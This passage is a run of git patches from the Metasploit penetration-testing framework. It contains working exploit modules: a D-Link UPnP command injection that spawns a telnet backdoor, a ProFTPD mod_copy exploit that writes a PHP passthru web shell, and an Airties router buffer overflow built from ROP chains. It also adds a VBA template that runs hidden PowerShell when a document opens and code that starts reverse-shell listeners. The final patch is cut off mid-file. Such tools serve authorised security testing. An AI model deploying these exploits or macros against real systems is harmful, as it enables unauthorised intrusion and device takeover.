-        # We don't have the :last method, so we retrieve at -1, which gives us the same thing
-        m[-1] = xploit
+        @bap_exploits << xploit
       end
-
-      # These can be done during initialization, so let's do that. But sort-by-requirement-count
-      # will have to occur after we actually have the target information.
-      $stderr.puts 
-      $stderr.puts list_bap_names
-      sort_by_disclosure_date
-      sort_by_rank
-      $stderr.puts
-      $stderr.puts list_bap_names
     end
 
+
+    # For debugging purposes.
     def list_bap_names
       bap_exploits.each do |m|
-        $stderr.puts m.first
+        print_status(m.fullname)
       end
     end
 
 
-    # Modifies an exploit's default datastore options
+    # Modifies an exploit's default datastore options.
     #
     # @return [void]
     def set_exploit_options(xploit)
@@ -90,30 +81,24 @@ module Msf
     end
 
 
-    # Checks if a resource is already taken or not
+    # Checks if a resource is already taken or not.
     #
-    # @return [TrueClass] Resource is taken
-    # @return [FalseClass] Resource is not taken
+    # @return [TrueClass] Resource is taken.
+    # @return [FalseClass] Resource is not taken.
     def is_resource_taken?(resource)
       taken = false
 
       bap_exploits.each do |m|
-        obj = m.last
-        if obj.respond_to?(:datastore) && obj.datastore['URI'] == resource
-          # When a module has not be initialized, the object does not have the datastore
-          # method. So we need to check that first, so that we can access the URI option
-          # safely.
-          return true 
-        end
+        return true if m.datastore['URI'] == resource
       end
 
       taken
     end
 
 
-    # Returns a unique resource path
+    # Returns a unique resource path.
     #
-    # @return [String]
+    # @return [String] A unique resource path.
     def assign_module_resource
       resource = ''
       while
@@ -130,8 +115,8 @@ module Msf
     # And then we fall back to the module's platform. If there's nothing we can choose,
     # then we'll just use the generic reverse shell.
     #
-    # @param [Class] The initialized exploit object
-    # @return [Hash] The default payload information from DEFAULT_PAYLOADS
+    # @param [Class] The initialized exploit object.
+    # @return [Hash] The default payload information from DEFAULT_PAYLOADS.
     def pick_default_payload(m)
       module_platforms = m.platform.platforms
       preferred_payload = DEFAULT_PAYLOADS['generic']
@@ -155,25 +140,70 @@ module Msf
     end
 
 
-    # Modifies @bap_exploits by sorting BAP exploits by disclosure date
+    # Modifies @bap_exploits by sorting. The newest and with the highest ranking goes on top.
     #
     # @return [void]
-    def sort_by_disclosure_date
-      @bap_exploits = bap_exploits.sort_by {|m| Date.parse(m.last.disclosure_date.to_s)}.reverse
+    def sort_bap_exploits
+      bap_groups = group_bap_modules
+      bap_groups = sort_date_in_group(bap_groups)
+      bap_groups = sort_group_by_rank(bap_groups)
+      finalize_sorted_modules(bap_groups)
     end
 
 
-    # Modifies @bap_exploits by sorting BAP exploits by ranking
+    # Sorts a grouped module list by disclosure date.
     #
-    # @return [void]
-    def sort_by_rank
-      @bap_exploits = bap_exploits.sort_by {|m| m.last.rank}
+    # @param [Hash] A grouped module list.
+    # @return [Hash] A hash with each module list sorted by disclosure date.
+    def sort_date_in_group(bap_groups)
+      bap_groups.each_pair do |ranking, module_list|
+        bap_groups[ranking] = module_list.sort_by {|m| Date.parse(m.disclosure_date.to_s)}.reverse
+      end
     end
 
 
-    # Returns a list of suitable exploits for the current target
+    # Sorts a module list by ranking.
     #
-    # @return [Array]
+    # @param [Hash] A grouped module list.
+    # @return [Hash] A hash grouped by ranking.
+    def sort_group_by_rank(bap_groups)
+      Hash[bap_groups.sort_by {|k,v| k}.reverse]
+    end
+
+
+    # Breaks @bap_exploits into groups.
+    #
+    # @return [Hash] A module list grouped by rank.
+    def group_bap_modules
+      bap_groups = {}
+      RankingName.each_pair do |ranking, value|
+        bap_groups[ranking] = []
+        bap_exploits.each do |m|
+          next if m.rank != ranking
+          bap_groups[ranking] << m
+        end
+      end
+      bap_groups
+    end
+
+
+    # Modifies @bap_exploit by replacing it with the rearranged module list.
+    #
+    # @param [Hash] A grouped module list.
+    # @return [void]
+    def finalize_sorted_modules(bap_groups)
+      @bap_exploits = []
+      bap_groups.each_pair do |ranking, module_list|
+        module_list.each do |m|
+          @bap_exploits << m
+        end
+      end
+    end
+
+
+    # Returns a list of suitable exploits for the current target.
+    #
+    # @return [Array] A list of suitable exploits to use against the target.
     def find_suitable_exploits(target_info)
       $stderr.puts target_info.inspect
     end
@@ -186,9 +216,11 @@ module Msf
       super
       print_status("Searching BES exploits, please wait...")
       init_exploits
+      sort_bap_exploits
+      $stderr.puts
+      $stderr.puts list_bap_names
       print_status("#{@bap_exploits.length} BES exploits found.")
     end
 
-
   end
 end

From b5335ab2660449625c0d178b5fa151702c1efbf3 Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Tue, 14 Apr 2015 19:03:08 -0500
Subject: [PATCH 0011/1013] Some progress, mostly documentation

---
 lib/msf/core/exploit/browserautopwnv2.rb  | 27 ++++++++++++++++++-----
 modules/exploits/multi/browser/autopwn.rb |  1 -
 2 files changed, 22 insertions(+), 6 deletions(-)

diff --git a/lib/msf/core/exploit/browserautopwnv2.rb b/lib/msf/core/exploit/browserautopwnv2.rb
index 2dfa8ca381..5dd1633a8a 100644
--- a/lib/msf/core/exploit/browserautopwnv2.rb
+++ b/lib/msf/core/exploit/browserautopwnv2.rb
@@ -9,9 +9,12 @@ require 'Date'
 module Msf
   module Exploit::Remote::BrowserAutopwnv2
 
+    # Exception specific for Msf::Exploit::Remote::BrowserAutopwnv2
+    class BAPv2Exception < RuntimeError; end
+
     include Msf::Exploit::Remote::BrowserExploitServer
 
-    # @return [Array] The exploit list BAP manages
+    # @return [Array] A list of initialized BAP exploits
     attr_reader :bap_exploits
 
 
@@ -28,7 +31,8 @@ module Msf
     }
 
 
-    # Returns all the found exploit modules that support BrowserExploitServer.
+    # Returns all the found exploit modules that support BrowserExploitServer by going through all
+    # the exploits from the framework object.
     #
     # @return [Array] A collection of BES modules in this format: [module_fullname, Class].
     def init_exploit_paths
@@ -39,8 +43,9 @@ module Msf
     end
 
 
-    # Initializes all found BES exploits.
+    # Initializes the @bap_exploits instance variable with all the found BAP exploits.
     #
+    # @see #bap_exploits The read-only attribute.
     # @return [void]
     def init_exploits
       @bap_exploits = [] # Initialized BES modules are held here
@@ -58,7 +63,9 @@ module Msf
     end
 
 
-    # For debugging purposes.
+    # Prints BAP module names
+    #
+    # @return [void]
     def list_bap_names
       bap_exploits.each do |m|
         print_status(m.fullname)
@@ -115,6 +122,7 @@ module Msf
     # And then we fall back to the module's platform. If there's nothing we can choose,
     # then we'll just use the generic reverse shell.
     #
+    # @see DEFAULT_PAYLOADS
     # @param [Class] The initialized exploit object.
     # @return [Hash] The default payload information from DEFAULT_PAYLOADS.
     def pick_default_payload(m)
@@ -142,6 +150,11 @@ module Msf
 
     # Modifies @bap_exploits by sorting. The newest and with the highest ranking goes on top.
     #
+    # @see #bap_exploits The read-only attribute.
+    # @see #sort_date_in_group The method for sorting by disclosure date
+    # @see #sort_group_by_rank The method for sorting by rank
+    # @see #sort_bap_modules The method for breaking the module list into groups
+    # @see #finalize_sorted_modules The method for finalizing bap_exploits
     # @return [void]
     def sort_bap_exploits
       bap_groups = group_bap_modules
@@ -171,7 +184,7 @@ module Msf
     end
 
 
-    # Breaks @bap_exploits into groups.
+    # Breaks @bap_exploits into groups for sorting purposes.
     #
     # @return [Hash] A module list grouped by rank.
     def group_bap_modules
@@ -189,6 +202,7 @@ module Msf
 
     # Modifies @bap_exploit by replacing it with the rearranged module list.
     #
+    # @see #bap_exploits The read-only attribute.
     # @param [Hash] A grouped module list.
     # @return [void]
     def finalize_sorted_modules(bap_groups)
@@ -203,6 +217,7 @@ module Msf
 
     # Returns a list of suitable exploits for the current target.
     #
+    # @param [Hash] Target's information such as the OS, browser, 3rd-party plugins, etc.
     # @return [Array] A list of suitable exploits to use against the target.
     def find_suitable_exploits(target_info)
       $stderr.puts target_info.inspect
@@ -211,6 +226,8 @@ module Msf
 
     # Sets up BAPv2. This is like our main function.
     #
+    # @see #init_exploits
+    # @see #sort_bap_exploits
     # @return [void]
     def setup
       super
diff --git a/modules/exploits/multi/browser/autopwn.rb b/modules/exploits/multi/browser/autopwn.rb
index ddd3d93e8b..1edbcc95aa 100644
--- a/modules/exploits/multi/browser/autopwn.rb
+++ b/modules/exploits/multi/browser/autopwn.rb
@@ -41,7 +41,6 @@ class Metasploit3 < Msf::Exploit::Remote
       'DefaultTarget'  => 0))
   end
 
-
   def on_request_exploit(cli, request, target_info)
     $stderr.puts get_target.inspect
     $stderr.puts find_suitable_exploits(target_info)

From 0282b433e9d95640640991e81d2e07b840103bbd Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Tue, 14 Apr 2015 21:33:10 -0500
Subject: [PATCH 0012/1013] Payload sort of works

---
 lib/msf/core/exploit/browserautopwnv2.rb | 36 +++++++++++++++++++++---
 1 file changed, 32 insertions(+), 4 deletions(-)

diff --git a/lib/msf/core/exploit/browserautopwnv2.rb b/lib/msf/core/exploit/browserautopwnv2.rb
index 5dd1633a8a..426477221f 100644
--- a/lib/msf/core/exploit/browserautopwnv2.rb
+++ b/lib/msf/core/exploit/browserautopwnv2.rb
@@ -26,7 +26,7 @@ module Msf
       'osx'     => { 'payload' => 'osx/meterpreter/reverse_tcp',     'lport' => 4446 },
       'java'    => { 'payload' => 'java/meterpreter/reverse_tcp',    'lport' => 4447 },
       'android' => { 'payload' => 'android/meterpreter/reverse_tcp', 'lport' => 4448 },
-      'firefox' => { 'payload' => 'firefox/shell_reverse_tcp',       'lport' => 4449 },
+#      'firefox' => { 'payload' => 'firefox/shell_reverse_tcp',       'lport' => 4449 },
       'generic' => { 'payload' => 'generic/shell_reverse_tcp',       'lport' => 4450 }
     }
 
@@ -34,6 +34,8 @@ module Msf
     # Returns all the found exploit modules that support BrowserExploitServer by going through all
     # the exploits from the framework object.
     #
+    # @note This method is using framework.exploits and it's one of the reasons why it's so slow.
+    # @todo Maybe look for a different way to get a list of exploits.
     # @return [Array] A collection of BES modules in this format: [module_fullname, Class].
     def init_exploit_paths
       framework.exploits.find_all do |m|
@@ -84,7 +86,7 @@ module Msf
       xploit.datastore['SSL'] = datastore['SSL']                  # Use SSL or not
       xploit.datastore['SSLVersion'] = datastore['SSLVersion']    # SSL Version
       xploit.datastore['LHOST'] = datastore['LHOST'] || '0.0.0.0' # Attacker's IP
-      xploit.datastore['URI'] = "/#{assign_module_resource}"
+      xploit.datastore['URI'] = "/#{assign_module_resource}"      # A unique resource URI for the exploit
     end
 
 
@@ -215,6 +217,29 @@ module Msf
     end
 
 
+    # Creates payload listeners.
+    #
+    # @note INCOMPLETE
+    # @return [void]
+    def start_payload_listeners
+      DEFAULT_PAYLOADS.each_pair do |platform, listener_info|
+        multi_handler = framework.modules.create('exploit/multi/handler')
+        multi_handler.datastore['PAYLOAD'] = listener_info['payload']
+        multi_handler.datastore['LPORT'] = listener_info['lport']
+        multi_handler.datastore['EXITONSESSION'] = false
+        multi_handler.datastore['EXITFUNC'] = 'thread'
+#        multi_handler.datastore['ReverseListenerBindAddress'] = datastore['ReverseListenerBindAddress']
+        multi_handler.exploit_simple(
+          'LocalInput' => self.user_input,
+          'LocalOutput' => self.user_output,
+          'Payload' => listener_info['payload'],
+          'RunAsJob' => true
+        )
+        $stderr.puts multi_handler.inspect
+      end
+    end
+
+
     # Returns a list of suitable exploits for the current target.
     #
     # @param [Hash] Target's information such as the OS, browser, 3rd-party plugins, etc.
@@ -234,9 +259,12 @@ module Msf
       print_status("Searching BES exploits, please wait...")
       init_exploits
       sort_bap_exploits
-      $stderr.puts
-      $stderr.puts list_bap_names
+#      $stderr.puts
+#      $stderr.puts list_bap_names
       print_status("#{@bap_exploits.length} BES exploits found.")
+
+      print_status("Starting listeners...")
+      start_payload_listeners
     end
 
   end

From 71728c5c0340de28ea570c871529cd5eba89e3b7 Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Wed, 15 Apr 2015 01:10:55 -0500
Subject: [PATCH 0013/1013] Changes

---
 lib/msf/core/exploit/browserautopwnv2.rb | 3 +++
 1 file changed, 3 insertions(+)

diff --git a/lib/msf/core/exploit/browserautopwnv2.rb b/lib/msf/core/exploit/browserautopwnv2.rb
index 426477221f..03789a10f5 100644
--- a/lib/msf/core/exploit/browserautopwnv2.rb
+++ b/lib/msf/core/exploit/browserautopwnv2.rb
@@ -255,6 +255,7 @@ module Msf
     # @see #sort_bap_exploits
     # @return [void]
     def setup
+      t1 = Time.now
       super
       print_status("Searching BES exploits, please wait...")
       init_exploits
@@ -265,6 +266,8 @@ module Msf
 
       print_status("Starting listeners...")
       start_payload_listeners
+      t2 = Time.now
+      $stderr.puts (t2-t1).inspect
     end
 
   end

From b229e87940bc519471e783b6adb9470607805ea0 Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Fri, 17 Apr 2015 16:51:53 +0100
Subject: [PATCH 0014/1013] Create VBA powershell

---
 .../scripts/to_powershell.vba.template        | 12 ++++++++
 lib/msf/util/exe.rb                           | 30 +++++++++++++++++++
 2 files changed, 42 insertions(+)
 create mode 100644 data/templates/scripts/to_powershell.vba.template

diff --git a/data/templates/scripts/to_powershell.vba.template b/data/templates/scripts/to_powershell.vba.template
new file mode 100644
index 0000000000..b56d930ae1
--- /dev/null
+++ b/data/templates/scripts/to_powershell.vba.template
@@ -0,0 +1,12 @@
+Sub %{sub_auto_open}()
+  Dim %{var_powershell}
+  %{var_powershell} = %{powershell}
+  Call Shell(%{var_powershell}, vbHide)
+End Sub
+Sub AutoOpen()
+  %{sub_auto_open}
+End Sub
+Sub Workbook_Open()
+  %{sub_auto_open}
+End Sub
+
diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb
index 3e1f19860e..909a98e161 100644
--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -1001,6 +1001,33 @@ require 'msf/core/exe/segment_appender'
     read_replace_script_template("to_mem.vba.template", hash_sub)
   end
 
+  def self.to_powershell_vba(framework, arch, code)
+    template_path = File.join(Msf::Config.data_directory,
+                              "templates",
+                              "scripts")
+
+    powershell = Rex::Powershell::Command.cmd_psh_payload(code,
+                    arch,
+                    template_path,
+                    encode_final_payload: true,
+                    remove_comspec: true,
+                    method: 'reflection')
+
+    # Intialize rig and value names
+    rig = Rex::RandomIdentifierGenerator.new()
+    rig.init_var(:sub_auto_open)
+    rig.init_var(:var_powershell)
+
+    hash_sub = rig.to_h
+    # VBA has a maximum of 24 line continuations
+    line_length = powershell.length / 24
+    vba_psh = '"' << powershell.scan(/.{1,#{line_length}}/).join("\" _\r\n& \"") << '"'
+
+    hash_sub[:powershell] = vba_psh
+
+    read_replace_script_template("to_powershell.vba.template", hash_sub)
+  end
+
   def self.to_exe_vbs(exes = '', opts = {})
     delay   = opts[:delay]   || 5
     persist = opts[:persist] || false
@@ -1904,6 +1931,8 @@ require 'msf/core/exe/segment_appender'
     when 'vba-exe'
       exe = to_executable_fmt(framework, arch, plat, code, 'exe-small', exeopts)
       Msf::Util::EXE.to_exe_vba(exe)
+    when 'vba-psh'
+      Msf::Util::EXE.to_powershell_vba(framework, arch, code)
     when 'vbs'
       exe = to_executable_fmt(framework, arch, plat, code, 'exe-small', exeopts)
       Msf::Util::EXE.to_exe_vbs(exe, exeopts.merge({ :persist => false }))
@@ -1950,6 +1979,7 @@ require 'msf/core/exe/segment_appender'
       "psh-cmd",
       "vba",
       "vba-exe",
+      "vba-psh",
       "vbs",
       "war"
     ]

From b991dec0f953532bf2a034b76f735b3ad2303b3c Mon Sep 17 00:00:00 2001
From: Michael Messner <devnull@s3cur1ty.de>
Date: Fri, 17 Apr 2015 22:54:32 +0200
Subject: [PATCH 0015/1013] Dlink UPnP SOAP-Header Injection

---
 .../http/dlink_upnp_header_exec_noauth.rb     | 134 ++++++++++++++++++
 1 file changed, 134 insertions(+)
 create mode 100644 modules/exploits/linux/http/dlink_upnp_header_exec_noauth.rb

diff --git a/modules/exploits/linux/http/dlink_upnp_header_exec_noauth.rb b/modules/exploits/linux/http/dlink_upnp_header_exec_noauth.rb
new file mode 100644
index 0000000000..7407e68ce7
--- /dev/null
+++ b/modules/exploits/linux/http/dlink_upnp_header_exec_noauth.rb
@@ -0,0 +1,134 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::CommandShell
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'D-Link Devices UPnP SOAPAction-Header Command Execution',
+      'Description' => %q{
+        Different D-Link Routers are vulnerable to OS command injection in the UPnP SOAP
+        interface. Since it is a blind OS command injection vulnerability, there is no
+        output for the executed command. This module has been tested on a DIR-645 device.
+        The following devices are also reported as affected:
+        DAP-1522 revB, DAP-1650 revB, DIR-880L, DIR-865L, DIR-860L revA, DIR-860L revB
+        DIR-815 revB, DIR-300 revB, DIR-600 revB, DIR-645, TEW-751DR, TEW-733GR
+      },
+      'Author'      =>
+        [
+          'Samuel Huntley', # first public documentation of this Vulnerability on DIR-645
+          'Craig Heffner', # independent Vulnerability discovery on different other routers
+          'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module
+        ],
+      'License'     => MSF_LICENSE,
+      'References'  =>
+        [
+          ['URL', 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10051'],
+          ['URL', 'http://www.devttys0.com/2015/04/hacking-the-d-link-dir-890l/']
+        ],
+      'DisclosureDate' => 'Feb 13 2015',
+      'Privileged'     => true,
+      'Platform'       => 'unix',
+      'Arch'        => ARCH_CMD,
+      'Targets'        =>
+        [
+          [ 'Automatic',        { } ]
+        ],
+      'DefaultTarget'  => 0
+      ))
+  end
+
+  def check
+    uri = '/HNAP1/'
+    soapaction = "http://purenetworks.com/HNAP1/GetDeviceSettings"
+
+    begin
+      res = send_request_cgi({
+        'uri'    => uri,
+        'method' => 'GET',
+        'headers' => {
+          'SOAPAction' => soapaction,
+          },
+      })
+      if res && [200].include?(res.code) && res.body =~ /D-Link/
+        return Exploit::CheckCode::Detected
+      end
+    rescue ::Rex::ConnectionError
+      return Exploit::CheckCode::Unknown
+    end
+
+    Exploit::CheckCode::Unknown
+  end
+
+  def exploit
+    print_status("#{peer} - Trying to access the device ...")
+
+    unless check == Exploit::CheckCode::Detected
+      fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable device")
+    end
+
+    print_status("#{peer} - Exploiting...")
+
+    telnetport = rand(32767) + 32768
+
+    cmd = "telnetd -p #{telnetport}"
+
+    execute_command(cmd)
+
+    handle_telnet(telnetport)
+  end
+
+  def handle_telnet(telnetport)
+
+    begin
+      sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i })
+
+      if sock
+        print_good("#{peer} - Backdoor service spawned")
+        add_socket(sock)
+      else
+        fail_with(Failure::Unreachable, "#{peer} - Backdoor service not spawned")
+      end
+
+      print_status "Starting a Telnet session #{rhost}:#{telnetport}"
+      merge_me = {
+        'USERPASS_FILE' => nil,
+        'USER_FILE'     => nil,
+        'PASS_FILE'     => nil,
+        'USERNAME'      => nil,
+        'PASSWORD'      => nil
+      }
+      start_session(self, "TELNET (#{rhost}:#{telnetport})", merge_me, false, sock)
+    rescue
+      fail_with(Failure::Unreachable, "#{peer} - Backdoor service not handled")
+    end
+    return
+  end
+
+  def execute_command(cmd)
+
+    uri = '/HNAP1/'
+
+    soapaction = "http://purenetworks.com/HNAP1/GetDeviceSettings/`#{cmd}`"
+
+    begin
+      res = send_request_cgi({
+        'uri'    => uri,
+        'method' => 'GET',
+        'headers' => {
+          'SOAPAction' => soapaction,
+          },
+      },1)
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
+    end
+  end
+end

From 92c91c76f749883db71a2a258aa9f9e2c6948781 Mon Sep 17 00:00:00 2001
From: xistence <xistence@0x90.nl>
Date: Wed, 22 Apr 2015 01:41:16 -0400
Subject: [PATCH 0016/1013] Proftpd 1.3.5 Mod_Copy Command Execution

---
 .../exploits/unix/ftp/proftpd_modcopy_exec.rb | 147 ++++++++++++++++++
 1 file changed, 147 insertions(+)
 create mode 100644 modules/exploits/unix/ftp/proftpd_modcopy_exec.rb

diff --git a/modules/exploits/unix/ftp/proftpd_modcopy_exec.rb b/modules/exploits/unix/ftp/proftpd_modcopy_exec.rb
new file mode 100644
index 0000000000..8d803b2338
--- /dev/null
+++ b/modules/exploits/unix/ftp/proftpd_modcopy_exec.rb
@@ -0,0 +1,147 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'ProFTPD 1.3.5 Mod_Copy Command Execution',
+      'Description'    => %q{
+          This module exploits the SITE CPFR/CPTO commands in ProFTPD version 1.3.5.
+          Any unauthenticated client can leverage these commands to copy files from any
+          part of the filesystem to a chosen destination. The copy commands are executed with
+          the rights of the ProFTPD service, which by default runs under the privileges of the
+          'nobody' user. By using /proc/self/cmdline to copy a PHP payload to the website
+          directory, PHP remote code execution is made possible.
+      },
+      'Author'         =>
+        [
+          'Vadim Melihow', # Original discovery, Proof of Concept
+          'xistence <xistence[at]0x90.nl>' # Metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'CVE', '2015-3306'],
+          [ 'EDB', '36742' ],
+        ],
+      'Privileged'     => false,
+      'Platform'       => [ 'unix' ],
+      'Arch'           => ARCH_CMD,
+      'Payload'        =>
+        {
+          'BadChars' => '',
+          'Compat'      =>
+            {
+              'PayloadType' => 'cmd',
+              'RequiredCmd' => 'generic gawk bash python perl',
+            }
+        },
+      'Targets'        =>
+        [
+          [ 'ProFTPD 1.3.5', { } ],
+        ],
+      'DisclosureDate' => 'Apr 22 2015',
+      'DefaultTarget' => 0))
+
+    register_options(
+      [
+        OptPort.new('RPORT', [true, 'HTTP port', 80]),
+        OptPort.new('RPORT_FTP', [true, 'FTP port', 21]),
+        OptString.new('SITEPATH', [true, 'Absolute writable website path', '/var/www']),
+        OptString.new('TARGETURI', [true, 'Base path to the website', '/'])
+      ], self.class)
+  end
+
+  def check
+    ftp_port = datastore['RPORT_FTP']
+    sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => ftp_port })
+
+    if sock.nil?
+      fail_with(Failure::Unreachable, "#{rhost}:#{@remoting_port.to_s} - Failed to connect to remoting service")
+    else
+      print_status("#{rhost}:#{ftp_port} - Connected to FTP server")
+    end
+
+    res = sock.get_once(-1,10)
+    unless ( res and res =~ /220/ )
+      fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure retrieving ProFTPD 220 OK banner")
+    end
+
+    sock.puts("SITE CPFR /etc/passwd\r\n")
+    res = sock.get_once(-1,10)
+    if res and res =~ /350/
+      return Exploit::CheckCode::Vulnerable
+    else
+      return Exploit::CheckCode::Safe
+    end
+  end
+
+  def exploit
+
+    ftp_port = datastore['RPORT_FTP']
+    get_arg = rand_text_alphanumeric(5+rand(3))
+    payload_name = rand_text_alphanumeric(5+rand(3)) + '.php'
+
+    sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => ftp_port })
+
+    if sock.nil?
+      fail_with(Failure::Unreachable, "#{rhost}:#{@remoting_port.to_s} - Failed to connect to remoting service")
+    else
+      print_status("#{rhost}:#{ftp_port} - Connected to FTP server")
+    end
+
+    res = sock.get_once(-1,10)
+    unless ( res and res =~ /220/ )
+      fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure retrieving ProFTPD 220 OK banner")
+    end
+
+    print_status("#{rhost}:21 - Sending copy commands to FTP server")
+
+    sock.puts("SITE CPFR /proc/self/cmdline\r\n")
+    res = sock.get_once(-1,10)
+    unless ( res and res =~ /350/ )
+      fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying from /proc/self/cmdline")
+    end
+
+    sock.put("SITE CPTO /tmp/.<?php passthru($_GET[\'#{get_arg}\']);?>\r\n")
+    res = sock.get_once(-1,10)
+    unless ( res and res =~ /250/ )
+      fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying to temporary payload file")
+    end
+
+    sock.put("SITE CPFR /tmp/.<?php passthru($_GET[\'#{get_arg}\']);?>\r\n")
+    res = sock.get_once(-1,10)
+    unless ( res and res =~ /350/ )
+      fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying from temporary payload file")
+    end
+
+    sock.put("SITE CPTO #{datastore['SITEPATH']}/#{payload_name}\r\n")
+    res = sock.get_once(-1,10)
+    unless ( res and res =~ /250/ )
+      fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying PHP payload to website path, directory not writable?")
+    end
+
+    sock.close
+
+    print_status("#{peer} - Executing PHP payload #{target_uri.path}#{payload_name}")
+    res = send_request_cgi!({
+      'uri' => normalize_uri(target_uri.path, payload_name),
+      'method' => 'GET',
+      'vars_get' => { get_arg => "nohup #{payload.encoded} &" },
+    })
+
+    unless ( res and res.code == 200 )
+      fail_with(Failure::Unknown, "#{rhost}:21 - Failure executing payload")
+    end
+
+  end
+end

From 58099d046968b14823f8f3b37adbc7746f0294ef Mon Sep 17 00:00:00 2001
From: m-1-k-3 <devnull@s3cu1ty.de>
Date: Wed, 22 Apr 2015 10:21:58 +0200
Subject: [PATCH 0017/1013] airties login bof module

---
 .../linux/http/airties_login_cgi_bof.rb       | 121 ++++++++++++++++++
 1 file changed, 121 insertions(+)
 create mode 100644 modules/exploits/linux/http/airties_login_cgi_bof.rb

diff --git a/modules/exploits/linux/http/airties_login_cgi_bof.rb b/modules/exploits/linux/http/airties_login_cgi_bof.rb
new file mode 100644
index 0000000000..d1679dd6a2
--- /dev/null
+++ b/modules/exploits/linux/http/airties_login_cgi_bof.rb
@@ -0,0 +1,121 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Airties login cgi Buffer Overflow',
+      'Description'    => %q{
+        This module exploits an remote buffer overflow vulnerability on several Airties routers.
+        The vulnerability exists in the handling of HTTP queries to the login cgi with
+        long redirect parameter values. The vulnerability can be exploitable without authentication. 
+        This module has been tested successfully on Airties firmware AirTies_Air5650v3TT_FW_1.0.2.0.bin
+        in emulation. Other firmware versions such as the Air6372, Air5760, Air5750, Air5650TT, Air5453, 
+        Air5444TT, Air5443, Air5442, Air5343, Air5342, Air5341, Air5021 are also reported as vulnerable.
+      },
+      'Author'         =>
+        [
+          'Batuhan Burakcin <batuhan[at]bmicrosystems.com>',   # discovered the vulnerability
+          'Michael Messner <devnull[at]s3cur1ty.de>', # Metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'Platform'       => ['linux'],
+      'Arch'           => ARCH_MIPSBE,
+      'References'     =>
+        [
+          ['EDB', '36577'],
+          ['URL', 'http://www.bmicrosystems.com/blog/exploiting-the-airties-air-series/'], #advisory
+          ['URL', 'http://www.bmicrosystems.com/exploits/airties5650tt.txt'], #PoC
+        ],
+      'Targets'        =>
+        [
+          [ 'AirTies_Air5650v3TT_FW_1.0.2.0',
+            {
+              'Offset'         => 359,
+              'LibcBase'       => 0x2aad1000,
+              'RestoreReg'     => 0x0003FE20,    # restore s-registers
+              'System'         => 0x0003edff,    # address of system-1
+              'CalcSystem'     => 0x000111EC,    # calculate the correct address of system
+              'CallSystem'     => 0x00041C10,    # call our system
+              'PrepareSystem'  => 0x000215b8,    # prepare $a0 for our system call
+            }
+          ]
+        ],
+      'DisclosureDate'  => 'Mar 31 2015',
+      'DefaultTarget'   => 0))
+      deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
+  end
+
+  def check
+    begin
+      res = send_request_cgi({
+        'uri'     => "/cgi-bin/login",
+        'method'  => 'GET'
+      })
+
+      if res && [200, 301, 302].include?(res.code) && res.body.to_s =~ /login.html\?ErrorCode=2/
+        return Exploit::CheckCode::Detected
+      end
+    rescue ::Rex::ConnectionError
+      return Exploit::CheckCode::Unknown
+    end
+
+    Exploit::CheckCode::Unknown
+  end
+
+  def exploit
+    print_status("#{peer} - Accessing the vulnerable URL...")
+
+    unless check == Exploit::CheckCode::Detected
+      fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL")
+    end
+
+    print_status("#{peer} - Exploiting...")
+    execute_cmdstager(
+      :flavor  => :echo,
+      :linemax => 100
+    )
+  end
+
+  def prepare_shellcode(cmd)
+    shellcode = rand_text_alpha_upper(target['Offset'])                    # padding
+    shellcode << [target['LibcBase'] + target['RestoreReg']].pack("N")     # restore registers with controlled values
+    shellcode << rand_text_alpha_upper(36)                                 # padding
+    shellcode << [target['LibcBase'] + target['System']].pack("N")         # s0 - system address-1
+    shellcode << rand_text_alpha_upper(16)                                 # unused registers $s1 - $s4
+    shellcode << [target['LibcBase'] + target['CallSystem']].pack("N")     # $s5 - call system
+    shellcode << rand_text_alpha_upper(8)                                  # unused registers $s6 - $s7
+    shellcode << [target['LibcBase'] + target['PrepareSystem']].pack("N")  # write sp to $a0 -> parameter for call to system
+    shellcode << rand_text_alpha_upper(28)                                 # padding
+    shellcode << [target['LibcBase'] + target['CalcSystem']].pack("N")     # add 1 to s0 (calculate system address)
+    shellcode << cmd
+  end
+
+  def execute_command(cmd, opts)
